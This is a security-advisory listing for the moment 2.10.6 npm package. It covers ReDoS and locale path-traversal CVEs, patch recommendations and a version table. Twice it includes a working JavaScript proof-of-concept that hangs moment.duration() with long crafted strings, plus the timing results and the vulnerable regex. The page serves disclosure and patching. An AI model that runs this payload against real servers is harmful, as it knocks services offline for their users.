NodeJS/moment/2.10.6
Parse, validate, manipulate, and display dates
https://www.npmjs.com/package/moment
MIT
5 Security Vulnerabilities
Regular Expression Denial of Service in moment
- https://nvd.nist.gov/vuln/detail/CVE-2017-18214
- https://github.com/advisories/GHSA-446m-mv8f-q348
- https://github.com/moment/moment/issues/4163
- https://github.com/moment/moment/pull/4326
- https://www.npmjs.com/advisories/532
- https://nodesecurity.io/advisories/532
- https://www.tenable.com/security/tns-2019-02
- https://github.com/moment/moment/commit/69ed9d44957fa6ab12b73d2ae29d286a857b80eb
Affected versions of moment
are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Recommendation
Update to version 2.19.3 or later.
Regular Expression Denial of Service in moment
- https://nvd.nist.gov/vuln/detail/CVE-2016-4055
- https://github.com/advisories/GHSA-87vv-r9j6-g5qv
- https://www.npmjs.com/advisories/55
- https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@%3Cdev.flink.apache.org%3E
- https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@%3Cuser.flink.apache.org%3E
- https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@%3Cuser.flink.apache.org%3E
- https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@%3Cuser.flink.apache.org%3E
- https://nodesecurity.io/advisories/55
- https://www.tenable.com/security/tns-2019-02
- http://www.openwall.com/lists/oss-security/2016/04/20/11
- http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
- http://www.securityfocus.com/bid/95849
Versions of moment
prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration()
.
Proof of concept
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
Results
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Recommendation
Please update to version 2.11.2 or later.
Path Traversal: 'dir/../../filename' in moment.locale
- https://github.com/moment/moment/security/advisories/GHSA-8hfj-j24r-96c4
- https://nvd.nist.gov/vuln/detail/CVE-2022-24785
- https://github.com/moment/moment/commit/4211bfc8f15746be4019bba557e29a7ba83d54c5
- https://github.com/advisories/GHSA-8hfj-j24r-96c4
- https://www.tenable.com/security/tns-2022-09
- https://security.netapp.com/advisory/ntap-20220513-0006/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5/
- https://lists.debian.org/debian-lts-announce/2023/01/msg00035.html
Impact
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr
is directly used to switch moment locale.
Patches
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Workarounds
Sanitize user-provided locale name before passing it to moment.js.
References
Are there any links users can visit to find out more?
For more information
If you have any questions or comments about this advisory: * Open an issue in moment repo
Moderate severity vulnerability that affects moment
Withdrawn, accidental duplicate publish.
The duration function in the moment package before 2.11.2 for Node.js allows remote attackers to cause a denial of service (CPU consumption) via a long string, aka a regular expression Denial of Service (ReDoS).
Regular Expression Denial of Service
moment is vulnerable to regular expression denial of service when user input is passed unchecked into moment.duration() blocking the event loop for a period of time.
The Regular expression Denial of Service (ReDoS) is a Denial of Service attack, that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and then hang for a very long time.
[1]
It's not a huge amplification it takes about 25k characters to get 1.1 seconds however that's well under most servers max request size so it's certainly exploitable.
The regular expression in question
moment/2.10.6/moment.js
1679 var aspNetRegex = /(\-)?(?:(\d*)\.)?(\d+)\:(\d+)(?:\:(\d+)\.?(\d{3})?)?/;
Proof of concept
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
Results
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Timeline:
- 10/26/2015 - Initial Discovery
- 10/26/2015 - Maintainers notified via email
- 12/16/2015 - Maintainers notified via email again
- 2/2/2016 - Added information to fix from pull request
- 2/3/2016 -
76 Other Versions
Version | License | Security | Released | |
---|---|---|---|---|
2.30.1 | MIT | 2023-12-27 - 10:38 | 11 months | |
2.30.0 | MIT | 2023-12-26 - 19:36 | 11 months | |
2.29.4 | MIT | 2022-07-06 - 16:01 | over 2 years | |
2.29.3 | MIT | 1 | 2022-04-17 - 18:27 | over 2 years |
2.29.2 | MIT | 1 | 2022-04-03 - 13:18 | over 2 years |
2.29.1 | MIT | 2 | 2020-10-06 - 11:21 | about 4 years |
2.29.0 | MIT | 2 | 2020-09-22 - 08:31 | about 4 years |
2.28.0 | MIT | 2 | 2020-09-13 - 11:27 | about 4 years |
2.27.0 | MIT | 2 | 2020-06-18 - 22:00 | over 4 years |
2.26.0 | MIT | 2 | 2020-05-20 - 06:46 | over 4 years |
2.25.3 | MIT | 2 | 2020-05-04 - 15:13 | over 4 years |
2.25.2 | MIT | 2 | 2020-05-04 - 12:29 | over 4 years |
2.25.1 | MIT | 2 | 2020-05-01 - 18:51 | over 4 years |
2.25.0 | MIT | 2 | 2020-05-01 - 01:27 | over 4 years |
2.24.0 | MIT | 2 | 2019-01-21 - 21:10 | almost 6 years |
2.23.0 | MIT | 2 | 2018-12-13 - 06:49 | almost 6 years |
2.22.2 | MIT | 2 | 2018-06-01 - 06:58 | over 6 years |
2.22.1 | MIT | 2 | 2018-04-15 - 06:06 | over 6 years |
2.22.0 | MIT | 2 | 2018-03-30 - 22:06 | over 6 years |
2.21.0 | MIT | 2 | 2018-03-02 - 20:41 | over 6 years |
2.20.1 | MIT | 2 | 2017-12-19 - 04:44 | almost 7 years |
2.20.0 | MIT | 2 | 2017-12-17 - 01:15 | almost 7 years |
2.19.4 | MIT | 2 | 2017-12-11 - 01:11 | almost 7 years |
2.19.3 | MIT | 2 | 2017-11-29 - 16:28 | almost 7 years |
2.19.2 | MIT | 3 | 2017-11-11 - 20:34 | about 7 years |
2.19.1 | MIT | 3 | 2017-10-11 - 21:02 | about 7 years |
2.19.0 | MIT | 3 | 2017-10-10 - 09:40 | about 7 years |
2.18.1 | MIT | 3 | 2017-03-21 - 22:58 | over 7 years |
2.18.0 | MIT | 3 | 2017-03-18 - 21:14 | over 7 years |
2.17.1 | MIT | 2 | 2016-12-04 - 05:48 | almost 8 years |
2.17.0 | MIT | 2 | 2016-11-22 - 13:48 | almost 8 years |
2.16.0 | MIT | 2 | 2016-11-10 - 06:54 | about 8 years |
2.15.2 | MIT | 2 | 2016-10-24 - 06:49 | about 8 years |
2.15.1 | MIT | 2 | 2016-09-21 - 03:39 | about 8 years |
2.15.0 | MIT | 2 | 2016-09-12 - 09:27 | about 8 years |
2.14.1 | MIT | 2 | 2016-07-04 - 06:44 | over 8 years |
2.14.0 | MIT | 2 | 2016-07-04 - 05:11 | over 8 years |
2.13.0 | MIT | 2 | 2016-04-18 - 07:41 | over 8 years |
2.12.0 | MIT | 2 | 2016-03-07 - 09:23 | over 8 years |
2.11.2 | MIT | 2 | 2016-02-03 - 22:47 | almost 9 years |
2.11.1 | MIT | 5 | 2016-01-09 - 13:17 | almost 9 years |
2.11.0 | MIT | 5 | 2016-01-02 - 23:38 | almost 9 years |
2.10.6 | MIT | 5 | 2015-07-28 - 04:45 | over 9 years |
2.10.5 | MIT | 5 | 2015-07-26 - 09:33 | over 9 years |
2.10.3 | MIT | 5 | 2015-05-13 - 07:54 | over 9 years |
2.10.2 | MIT | 5 | 2015-04-09 - 06:39 | over 9 years |
2.9.0 | MIT | 5 | 2015-01-08 - 15:01 | almost 10 years |
2.8.4 | MIT | 5 | 2014-11-19 - 04:47 | almost 10 years |
2.8.3 | MIT | 5 | 2014-09-05 - 08:06 | about 10 years |
2.8.2 | MIT | 5 | 2014-08-22 - 13:55 | about 10 years |
2.8.1 | MIT | 5 | 2014-08-01 - 17:21 | over 10 years |
2.7.0 | MIT | 5 | 2014-06-12 - 07:05 | over 10 years |
2.6.0 | MIT | 5 | 2014-04-12 - 16:39 | over 10 years |
2.5.1 | MIT | 5 | 2014-01-22 - 09:28 | almost 11 years |
2.5.0 | MIT | 5 | 2013-12-23 - 21:09 | almost 11 years |
2.4.0 | MIT | 5 | 2013-10-27 - 02:26 | about 11 years |
2.3.1 | MIT | 5 | 2013-10-09 - 02:38 | about 11 years |
2.3.0 | MIT | 5 | 2013-10-07 - 08:30 | about 11 years |
2.2.1 | MIT | 5 | 2013-09-12 - 08:39 | about 11 years |
2.1.0 | MIT | 5 | 2013-07-07 - 20:33 | over 11 years |
2.0.0 | MIT | 5 | 2013-02-08 - 19:13 | almost 12 years |
1.7.2 | MIT | 5 | 2012-10-02 - 17:17 | about 12 years |
1.7.1 | MIT | 5 | 2012-10-01 - 17:33 | about 12 years |
1.7.0 | MIT | 5 | 2012-07-25 - 19:10 | over 12 years |
1.6.2 | MIT | 5 | 2012-05-04 - 17:20 | over 12 years |
1.6.1 | MIT | 5 | 2012-04-26 - 22:30 | over 12 years |
1.6.0 | MIT | 5 | 2012-04-26 - 16:50 | over 12 years |
1.5.1 | MIT | 5 | 2012-04-06 - 02:08 | over 12 years |
1.5.0 | MIT | 5 | 2012-03-19 - 19:44 | over 12 years |
1.4.0 | MIT | 5 | 2012-02-03 - 19:16 | almost 13 years |
1.3.0 | MIT | 5 | 2012-01-05 - 17:51 | almost 13 years |
1.2.0 | MIT | 5 | 2011-12-06 - 18:33 | almost 13 years |
1.1.1 | MIT | 5 | 2011-11-11 - 19:16 | about 13 years |
1.1.0 | MIT | 5 | 2011-10-27 - 23:21 | about 13 years |
1.0.1 | MIT | 5 | 2011-12-06 - 18:33 | almost 13 years |
1.0.0 | MIT | 5 | 2011-12-06 - 18:33 | almost 13 years |